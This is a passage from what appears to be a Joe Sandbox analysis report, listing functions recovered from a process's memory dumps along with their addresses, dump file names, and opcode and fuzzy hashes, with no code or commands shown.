                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 73d4a3ab4d115ff77be103bef5bbb252dd6745032dbb99dae7feb831e4c6b24b
                                    • Instruction ID: c0cdf510b56a52060f17d7f7b6156fc233073d00636d33bdeb885aa26a96eebf
                                    • Opcode Fuzzy Hash: 73d4a3ab4d115ff77be103bef5bbb252dd6745032dbb99dae7feb831e4c6b24b
                                    • Instruction Fuzzy Hash: B2619070D58A1D8FEB94EFA8C8557ECBBB1FF58340F5051AA900DE3292DE346985CB41
                                    Function 00007FF887AF31E5 Relevance: .2, Instructions: 165COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fd15618809a9a889d36cb94d5fbef6827b538a72f8d5a4935ff5505b3af2e6d9
                                    • Instruction ID: 6847c01b7a18539970184f81390aa938519a0205a97dcf32f978bca78a332e97
                                    • Opcode Fuzzy Hash: fd15618809a9a889d36cb94d5fbef6827b538a72f8d5a4935ff5505b3af2e6d9
                                    • Instruction Fuzzy Hash: 6F515674D4960E8FEB58EBA8D4556EDBBF1FF58350F40417AD009E7292DE38A984CB00
                                    Function 00007FF887B06288 Relevance: .2, Instructions: 163COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5ba6f742e08ba95c78e01be9cea615fefdd9cbac8ce97d3e26bfa640f623931e
                                    • Instruction ID: 5440123add0f9a390425dc01b710ad7e4e748fca8b52e654b0140b30c688af61
                                    • Opcode Fuzzy Hash: 5ba6f742e08ba95c78e01be9cea615fefdd9cbac8ce97d3e26bfa640f623931e
                                    • Instruction Fuzzy Hash: AA51EA70D486198FEBA8EB54C8597ADB7B2FF59344F1041BAD00DE7292DF386984CB42
                                    Function 00007FF887AFC835 Relevance: .2, Instructions: 152COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5304ec02802f6f45cd80d40f4fcce903429d4c3f9e0a55ec02aac29ffb15a7b2
                                    • Instruction ID: 4f7c3b52eeb279a22aa2f617c7d89baf2b9b98792d6935c11e74856e25d80ef6
                                    • Opcode Fuzzy Hash: 5304ec02802f6f45cd80d40f4fcce903429d4c3f9e0a55ec02aac29ffb15a7b2
                                    • Instruction Fuzzy Hash: C841D222A5C25A5BEB01BBEDB8421FD7770FF417B6F14053BE40CD9083DE286489C69A
                                    Function 00007FF887B01BB8 Relevance: .2, Instructions: 151COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2eb5fced721549aef61d69999add52eea23a602aebe43a5023232181e3c37cb4
                                    • Instruction ID: 8d1e1d4f4ffd1039cfa5aa756890fbf5c80df31fbecb58fa561243d6529fa84c
                                    • Opcode Fuzzy Hash: 2eb5fced721549aef61d69999add52eea23a602aebe43a5023232181e3c37cb4
                                    • Instruction Fuzzy Hash: 7851CE7180E3C98FD7079F7488656A93FF0AF17210F0A44EBD085CB0A3E6689A59C722
                                    Function 00007FF887B0B596 Relevance: .1, Instructions: 135COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d0f8f2c6319e80a39d4229ffacce0f69b254377e43001b1de8f945731ab76da8
                                    • Instruction ID: f7ed8c98fd2d7983787840cfd904bf970df524ac794c0088791b950bb2e58182
                                    • Opcode Fuzzy Hash: d0f8f2c6319e80a39d4229ffacce0f69b254377e43001b1de8f945731ab76da8
                                    • Instruction Fuzzy Hash: 63411734A4C9498FEBA8DB08CC556BAB3E2FF98355F040276E44DD7552CE24AC02CB81
                                    Function 00007FF887B0AF4D Relevance: .1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 731c258700c2d51658bd9f8467510e536cb00340ef716ce1a674ed2d09410f75
                                    • Instruction ID: c9ac0c23614f6cb14f4df84402140a38d66b01f9f1be83f7a4147a96dae8ae80
                                    • Opcode Fuzzy Hash: 731c258700c2d51658bd9f8467510e536cb00340ef716ce1a674ed2d09410f75
                                    • Instruction Fuzzy Hash: 3B313970E4891D8FDB94EFA8D8596FDB7B2FF59354F50057AE009E3281DA346841CB40
                                    Function 00007FF887B0CE79 Relevance: .1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0f2c45249e03313a2c25f462e23aede09d50e34810519b50db7ee13f18a1da26
                                    • Instruction ID: a51d7ec4d4ae0dc3bbb8a2efdf1342aabdfefc81790607d90849797f56ded831
                                    • Opcode Fuzzy Hash: 0f2c45249e03313a2c25f462e23aede09d50e34810519b50db7ee13f18a1da26
                                    • Instruction Fuzzy Hash: BB314B31E9C91A8FE764971898959FD77B2FF48790B240176E00EE3192CF28BC05E782
                                    Function 00007FF887B07159 Relevance: .1, Instructions: 110COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f054f26a8b6639ae6bd62680977fc18aff8bf351dd802cea08927dc269682af6
                                    • Instruction ID: 6621d66b46a89364b0088c21789222f3ea53a8890b06298b90a0f46bce984e01
                                    • Opcode Fuzzy Hash: f054f26a8b6639ae6bd62680977fc18aff8bf351dd802cea08927dc269682af6
                                    • Instruction Fuzzy Hash: 4441CE3094864A8FEB55EBA4C4446FDB7B2FF69350F1841BAD009E71D6DE38A849CB81
                                    Function 00007FF887B03BFB Relevance: .1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3288f64025f4c09754e4ec832c7ebcaad3b9df73f22535202f231f15353dbc48
                                    • Instruction ID: df0fa4626ffae9749361de3afec005b759a3aa9e0864eb858c7c75a276a2bf0b
                                    • Opcode Fuzzy Hash: 3288f64025f4c09754e4ec832c7ebcaad3b9df73f22535202f231f15353dbc48
                                    • Instruction Fuzzy Hash: BE310632A4C64A5FE711EB6D985D2FD3BB0FF553A1F04047BD10CC7062DA249584C762
                                    Function 00007FF887B12309 Relevance: .1, Instructions: 108COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 05c50303a83e4f010979fe02186af52a44392039ccb5d0684c8eb8f204e27129
                                    • Instruction ID: c76007888b2de5fcf99167fdee0c8a7d0f67b6c8e4a6b51c53ddf28ffd98895d
                                    • Opcode Fuzzy Hash: 05c50303a83e4f010979fe02186af52a44392039ccb5d0684c8eb8f204e27129
                                    • Instruction Fuzzy Hash: 0E315230F9C91A8FEB64C798B4456FD77B2FF49390F640176E40EC7191EA186881D7A2
                                    Function 00007FF887B05464 Relevance: .1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8fe8b8e909a232ebce8aeaa1db0c8883e88396ad78f9e35346b7ea864143e469
                                    • Instruction ID: c4147cd98190fa2b5e50045cfffea759e44a0b6ef86c4cff5062fc8be371a730
                                    • Opcode Fuzzy Hash: 8fe8b8e909a232ebce8aeaa1db0c8883e88396ad78f9e35346b7ea864143e469
                                    • Instruction Fuzzy Hash: 42311A70D58A4D9FEB94EBA8D889BADBBF2FF58340F10017AD00CE7691DA346841CB40
                                    Function 00007FF887B05AB8 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53a3aa72cdfa35960456ab2628864231701b32fd983ac7b42280591e4a3ed132
                                    • Instruction ID: 7372b9f5f72e43d14e954f3fd8b00dbe1445f87a1268da414e9a3b5f61812f95
                                    • Opcode Fuzzy Hash: 53a3aa72cdfa35960456ab2628864231701b32fd983ac7b42280591e4a3ed132
                                    • Instruction Fuzzy Hash: 1031D47095852E8FDBA4EE28D885BED77F1FF59345F0001BA940DE7251DA38AA80CB81
                                    Function 00007FF887B08E28 Relevance: .1, Instructions: 97COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d22d33eb2762d834dec628e78c8e98d95257b73be1db2bcc0e85f8aa306dd77a
                                    • Instruction ID: 118f0bb381dd6186027a14d1e2e70fb480cb70312ff10afd3ead8a5e7ffe89a7
                                    • Opcode Fuzzy Hash: d22d33eb2762d834dec628e78c8e98d95257b73be1db2bcc0e85f8aa306dd77a
                                    • Instruction Fuzzy Hash: 3831C27095852E8FDBA4EE28D8947ED77F1FF59345F0001BA940DE7291DB38AA90CB81
                                    Function 00007FF887B088BA Relevance: .1, Instructions: 95COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: add6b1c14298d9708e7649a25aa768d541577095f0c29fb3b069755bc036e741
                                    • Instruction ID: 9e2e5a0f53f894085c92399c66f61764abb1ee172f72f04b4ec103286809fed8
                                    • Opcode Fuzzy Hash: add6b1c14298d9708e7649a25aa768d541577095f0c29fb3b069755bc036e741
                                    • Instruction Fuzzy Hash: D9315E35D4892D8FEBA5EA488881BFD73F2FB54360F4051A6C00DF3281DA34AA85CB41
                                    Function 00007FF887B13A50 Relevance: .1, Instructions: 88COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3616ec57507eef3ce4e4d631617195a00ea6e927bdaf30316779dc758a4abb26
                                    • Instruction ID: 96023316ab6796addaa14449d6f9d17399e7f7bc9929ad7ae260c21fd87c778c
                                    • Opcode Fuzzy Hash: 3616ec57507eef3ce4e4d631617195a00ea6e927bdaf30316779dc758a4abb26
                                    • Instruction Fuzzy Hash: 6F31392099C5E64AE72AC21844605BD7F72FF9235072886FAD08FCB497F92CF986C351
                                    Function 00007FF887B0849C Relevance: .1, Instructions: 87COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3126d57a7ec4b2052316c61e80cd08aca8af6338a28622cb3c69c58ac83fc2ee
                                    • Instruction ID: 56a89c980c13b6ee04f9bf7c37ddd563702f28a036b8f340c318b6e351182235
                                    • Opcode Fuzzy Hash: 3126d57a7ec4b2052316c61e80cd08aca8af6338a28622cb3c69c58ac83fc2ee
                                    • Instruction Fuzzy Hash: 75319370E0895D8FEBA4EB688895BADB7B2FB59340F5045EAD00DE7291DF345A81CF01
                                    Function 00007FF887B06EF1 Relevance: .1, Instructions: 87COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9fde568a883b4c30a02fecc31a8e1fe2ff5b939595bcb178c32ca53fac3b4473
                                    • Instruction ID: e1a87b0c07b9235a2d1298e7f8256c938b0978710f8b32239ebf6cf4902f9ced
                                    • Opcode Fuzzy Hash: 9fde568a883b4c30a02fecc31a8e1fe2ff5b939595bcb178c32ca53fac3b4473
                                    • Instruction Fuzzy Hash: 53218D3094860E8FDB99EF68C4552BE7BB1FF69344F1005BAD419D7191DE34A450CB81
                                    Function 00007FF887B07035 Relevance: .1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b1f9cabb4ab31cdf3621b564ee6cf194075c3ca091f84d4415ad83ff7807bc59
                                    • Instruction ID: 4235a6bcf022baae9d8e65967f7a3c1840f12442b4648fd793cb079372824762
                                    • Opcode Fuzzy Hash: b1f9cabb4ab31cdf3621b564ee6cf194075c3ca091f84d4415ad83ff7807bc59
                                    • Instruction Fuzzy Hash: B821EF30948A4A8FEF99EF2888662BD77B2FF64344F0801BED40EC7192EE35A414C741
                                    Function 00007FF887B0E9E1 Relevance: .1, Instructions: 86COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 404b7c8a4fff319d24c09e671099726ebad10c1398b85e5e0eeff314089a2e5a
                                    • Instruction ID: 4b01e5905d3e55ce17061a5adf134c2151f76b56215896fd853790f414763d09
                                    • Opcode Fuzzy Hash: 404b7c8a4fff319d24c09e671099726ebad10c1398b85e5e0eeff314089a2e5a
                                    • Instruction Fuzzy Hash: 29312D2099D5D74AF729921844645B8BF72FF5539071C86FAC08BDB4F7C82CB886D341
                                    Function 00007FF887B02A21 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1fab1e2a21647eb72c5669021aa3aaa539c6b68ccf6bf4f1741c5bc9b5f43cc4
                                    • Instruction ID: 747e5782b92a775036770cc31e7f9dfc136002ba14b484886f6aaafd2151e90c
                                    • Opcode Fuzzy Hash: 1fab1e2a21647eb72c5669021aa3aaa539c6b68ccf6bf4f1741c5bc9b5f43cc4
                                    • Instruction Fuzzy Hash: 8B3149309486598FEB61EFA4C8457ED77F2BF48350F0041BAD409A7292DF386998CB51
                                    Function 00007FF887AFC380 Relevance: .1, Instructions: 82COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4372df0a9f9c5b76b6bf151c1b3f05b3ad79d9644e34928ca40a377b7cb8c358
                                    • Instruction ID: c913e7641c969fa3488c1405680635578fe33df74b8fb07fdfe61749d172d3e2
                                    • Opcode Fuzzy Hash: 4372df0a9f9c5b76b6bf151c1b3f05b3ad79d9644e34928ca40a377b7cb8c358
                                    • Instruction Fuzzy Hash: 8721C1318CE3D65FD7079B705C261F97FB0AF03224B0A01EBE488CA4A3D62D5596C362
                                    Function 00007FF887B07571 Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc2fdee3b71bce5fb6460f662d4701b136596538a56d9ef331f6df6c223275d2
                                    • Instruction ID: 11061290405500346447f3e5e0d293433f32be1a8e8a89d70e6bb854dcd459a5
                                    • Opcode Fuzzy Hash: fc2fdee3b71bce5fb6460f662d4701b136596538a56d9ef331f6df6c223275d2
                                    • Instruction Fuzzy Hash: 48219535A4894E8FEF91EB68D8056EEB7F2FF29350F0408B2D408E7092EA28A444C740
                                    Function 00007FF887B088FE Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de78922df0a13732ad3b354e3417f72dce14dc396bcedc4f9fdd8ec1314d86bd
                                    • Instruction ID: 7089e17751c33f4776e51e2b5aed38bc274011284fe762a0f63560af108b5b94
                                    • Opcode Fuzzy Hash: de78922df0a13732ad3b354e3417f72dce14dc396bcedc4f9fdd8ec1314d86bd
                                    • Instruction Fuzzy Hash: 68213C35D48A2D8FEFA5EE489881BFD73F1FB54350F4050A6C00DE3241DA34AA86CB91
                                    Function 00007FF887B061E9 Relevance: .1, Instructions: 79COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: df01ea8675882b36ed282a988005243a45c16c8cad406ad3f2985e265df9ccc6
                                    • Instruction ID: 7cc67c669379f531d1c33bbc227d20af94f3f7afa54caa3a6c8db66f9dd6d725
                                    • Opcode Fuzzy Hash: df01ea8675882b36ed282a988005243a45c16c8cad406ad3f2985e265df9ccc6
                                    • Instruction Fuzzy Hash: 56219C3094864E8FEB51EB7488596BD7BF1FF5A354F0008BAD41CDB0A2EE38A444C742
                                    Function 00007FF887B094EF Relevance: .1, Instructions: 77COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dcc9c57f7d180a73df39b2502825b8e7a478f784ca817cd8fd454fd284ef23d6
                                    • Instruction ID: 71bd59d510f28c76a26c1b8cd96d0f0289dda8093114e04b1b6bc3c296b06bd2
                                    • Opcode Fuzzy Hash: dcc9c57f7d180a73df39b2502825b8e7a478f784ca817cd8fd454fd284ef23d6
                                    • Instruction Fuzzy Hash: A221D430E4941D9FDBA8EB58D8A5AEDB3B2FF59340F5045A5D00EE3291CE34AE81CB40
                                    Function 00007FF887B088A9 Relevance: .1, Instructions: 77COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 627da534c828b5ec6df0bc471701018dbe7495ca26b3676069c5ff94908f5c76
                                    • Instruction ID: 41ef087bd8983459489cbd0f048c36fb557c197c595fff4447067e94d96aebb0
                                    • Opcode Fuzzy Hash: 627da534c828b5ec6df0bc471701018dbe7495ca26b3676069c5ff94908f5c76
                                    • Instruction Fuzzy Hash: 7F219831D59A2D8EEBA0EB1888957FCB7F2FF55340F0050AAD08DE3181DE35AA85CB41
                                    Function 00007FF887AF33E0 Relevance: .1, Instructions: 76COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction ID: 9bf27d9661155ac42378ee06af4d018f17bf8528acb0f72615dd10ad969b64a9
                                    • Opcode Fuzzy Hash: c42b6ea764a808d7b24a44075f05e3566ff286062211c68ea7664dff25f9cb75
                                    • Instruction Fuzzy Hash: 75216D3188D78A8FD743EBB48C195A97FF0EF47351B0944FBD449CB0A2DA299489C722
                                    Function 00007FF887AF3575 Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction ID: 7bb66bb6e51c93e28a0af7829b4ef3ead89c587cf82cfc9c410fae82dd4659a5
                                    • Opcode Fuzzy Hash: c154f0b75d64ab9b9af40d3f598413a22c594a63637a3ea5d93c63151e93faf0
                                    • Instruction Fuzzy Hash: 5F21497494854E8FEB95EB68C45A6BD7BF0FF98344F4008BAD41DCB191EB38A584C741
                                    Function 00007FF887AFD39D Relevance: .1, Instructions: 73COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e36fbe2add82db6410b7ce03ad3b72b857aa8633e223534b4c355d87dd073f33
                                    • Instruction ID: 39e651aee6218b917c2c1d65a7e3911b854cd482e3157524c3bb8acb653c7344
                                    • Opcode Fuzzy Hash: e36fbe2add82db6410b7ce03ad3b72b857aa8633e223534b4c355d87dd073f33
                                    • Instruction Fuzzy Hash: C221D03094C60E8FEB59EB54C4966BE7BB2FF58351F1146BAC00AC7285CA38A489C780
                                    Function 00007FF887B07CAD Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: df6d4bc727f5bdb5d183b598c1d1b75c0894a6a59c4597195ebb420d8c5d8157
                                    • Instruction ID: 3cea0109d42993ed4a64d7ae0a6127760d8284fafdc4f0c7657da124f8e39178
                                    • Opcode Fuzzy Hash: df6d4bc727f5bdb5d183b598c1d1b75c0894a6a59c4597195ebb420d8c5d8157
                                    • Instruction Fuzzy Hash: B211227088824E8FDB46EB64C8592FEBBF0FF19314F0405BAD819CB092DA39A186C741
                                    Function 00007FF887B037B0 Relevance: .1, Instructions: 72COMMON
                                    Download Yara Rule
                                    Memory Dump Source
